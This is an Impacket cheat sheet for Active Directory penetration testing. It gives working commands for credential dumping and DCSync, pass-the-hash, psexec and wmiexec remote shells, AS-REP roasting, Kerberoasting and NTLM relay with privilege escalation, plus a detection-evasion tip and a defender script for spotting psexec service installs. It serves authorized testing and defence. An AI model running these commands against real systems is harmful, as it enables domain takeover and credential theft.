CyberCheatsheets

Impacket Cheat Sheet

Python toolkit for SMB, Kerberos, and Windows protocol attacks.

Category: Active Directory & Windows. Tags: ad, kerberos, relay, secrets, smb. Updated 2026-06-02

Overview

Impacket provides scripts used daily in AD testing: remote execution, hash extraction, Kerberoasting, and NTLM relay. Ethics: secretsdump, relay, and remote exec are destructive and logged—authorized lab or explicit pentest scope only. Never run relay or DCSync against systems you do not own or have written permission to test.

Install

sudo apt install impacket-scripts

or pip:

pip install impacket
impacket-secretsdump -h

Essential commands

List examples

ls /usr/share/doc/python3-impacket/examples/ 2>/dev/null
impacket-psexec -h

Common workflows

secretsdump: remote dump (admin creds)

impacket-secretsdump corp.local/administrator:'Password1!'@10.10.10.10

Pass-the-hash

impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 corp.local/admin@10.10.10.10

Local SAM/SECURITY/SYSTEM offline

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

NTDS.dit offline

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

psexec: remote shell

impacket-psexec corp.local/administrator:'Password1!'@10.10.10.10
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.10

wmiexec: WMI shell (often quieter)

impacket-wmiexec corp.local/user:'Password1!'@10.10.10.10
impacket-wmiexec -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@10.10.10.10 'hostname'

GetNPUsers: AS-REP roast (no preauth)

impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
impacket-GetNPUsers corp.local/user -no-pass -dc-ip 10.10.10.1

ntlmrelayx: listener on attacker, relaying to LDAP (authorized lab!)

impacket-ntlmrelayx -t ldap://10.10.10.1 -smb2support --escalate-user lowpriv

Relay to SMB

impacket-ntlmrelayx -tf targets.txt -smb2support

With SOCKS / WebDAV (check version docs)

impacket-ntlmrelayx -t smb://10.10.10.20 -smb2support -socks

Other high-value scripts

impacket-GetUserSPNs corp.local/user:'Pass' -dc-ip 10.10.10.1 -request
impacket-getTGT corp.local/user:'Pass'
impacket-getST -spn cifs/dc01.corp.local corp.local/user:'Pass'
impacket-smbclient corp.local/user:'Pass'@10.10.10.5

Flags: secretsdump.py

-just-dc-user krbtgt    DCSync one account
-just-dc                DCSync all domain hashes
-pwd-last-set           Show pwdLastSet when dumping
-outputfile out.txt     Write hashes to file

Flags: psexec.py / wmiexec.py

-codec cp850            Output encoding (psexec)
-target-ip 10.10.10.5   Connect by IP
-silentcommand          No echo of command output (wmiexec)

Flags: GetNPUsers.py

-no-pass                Do not ask for password (user list only)
-dc-ip 10.10.10.1       Domain controller IP
-request                Request TGTs for crackable AS-REP hashes

Flags: ntlmrelayx.py

-t smb://10.10.10.5     Relay target
--escalate-user         Attempt privilege escalation on relay
-smb2support            Use SMB2

Tips

  • Ethics: DCSync and relay can compromise a domain in minutes—get sign-off; disable IPv6 mitigations only in lab.
  • Use -k (Kerberos auth) when you have tickets; use -no-pass with -hashes for pass-the-hash.
  • Defenders see service-install event 7045, logon event 4624, and RPC patterns—prefer wmiexec/smbexec per opsec notes in scope.
  • After GetNPUsers / Kerberoast, crack with hashcat -m 18200 (AS-REP) / -m 13100 (TGS-REP).
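A defender-side counterpart to the 7045/4624 tip above, added here as example code (not part of the original cheat sheet or of Impacket): Python that correlates constructed Windows event records to flag a psexec-style service install. The random 4-letter service name and 8-letter binary name are an assumption about Impacket psexec defaults; tune both patterns and the window for your environment.

```python
import re
from datetime import datetime, timedelta

# Heuristics (assumptions, not from the cheat sheet): Impacket psexec by default
# registers a random 4-letter service running a random 8-letter .exe, shortly
# after a network logon (4624, LogonType 3) on the same host.
SERVICE_RE = re.compile(r"^[A-Za-z]{4}$")
IMAGE_RE = re.compile(r"(^|[\\/])[A-Za-z]{8}\.exe$", re.IGNORECASE)
WINDOW = timedelta(seconds=60)

# Constructed sample events, not real telemetry.
EVENTS = [
    {"EventID": 4624, "Computer": "WS01", "Time": "2026-06-02T10:00:00",
     "LogonType": 3, "TargetUserName": "administrator", "IpAddress": "10.10.10.99"},
    {"EventID": 7045, "Computer": "WS01", "Time": "2026-06-02T10:00:04",
     "ServiceName": "pGqX", "ImagePath": "%systemroot%\\FsBzNjHn.exe"},
    {"EventID": 4624, "Computer": "WS02", "Time": "2026-06-02T10:05:00",
     "LogonType": 2, "TargetUserName": "jdoe", "IpAddress": "-"},
    {"EventID": 7045, "Computer": "WS02", "Time": "2026-06-02T10:05:10",
     "ServiceName": "Sense", "ImagePath": "C:\\Program Files\\WD\\MsSense.exe"},
    {"EventID": 7045, "Computer": "WS03", "Time": "2026-06-02T11:00:00",
     "ServiceName": "abCD", "ImagePath": "C:\\Windows\\qwErTyUi.exe"},
]

def _ts(event):
    return datetime.fromisoformat(event["Time"])

def looks_like_psexec_service(event):
    """True for a 7045 whose service and binary names match the random-name pattern."""
    return bool(event["EventID"] == 7045
                and SERVICE_RE.match(event.get("ServiceName", ""))
                and IMAGE_RE.search(event.get("ImagePath", "")))

def find_psexec_candidates(events, window=WINDOW):
    """Flag suspicious installs; 'high' when a type-3 logon on the host preceded it."""
    logons = [e for e in events if e["EventID"] == 4624 and e.get("LogonType") == 3]
    hits = []
    for e in sorted(events, key=_ts):
        if not looks_like_psexec_service(e):
            continue
        prior = [l for l in logons if l["Computer"] == e["Computer"]
                 and timedelta(0) <= _ts(e) - _ts(l) <= window]
        hits.append({"host": e["Computer"], "service": e["ServiceName"],
                     "source": prior[-1]["IpAddress"] if prior else None,
                     "confidence": "high" if prior else "medium"})
    return hits

if __name__ == "__main__":
    for hit in find_psexec_candidates(EVENTS):
        print(hit)
```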
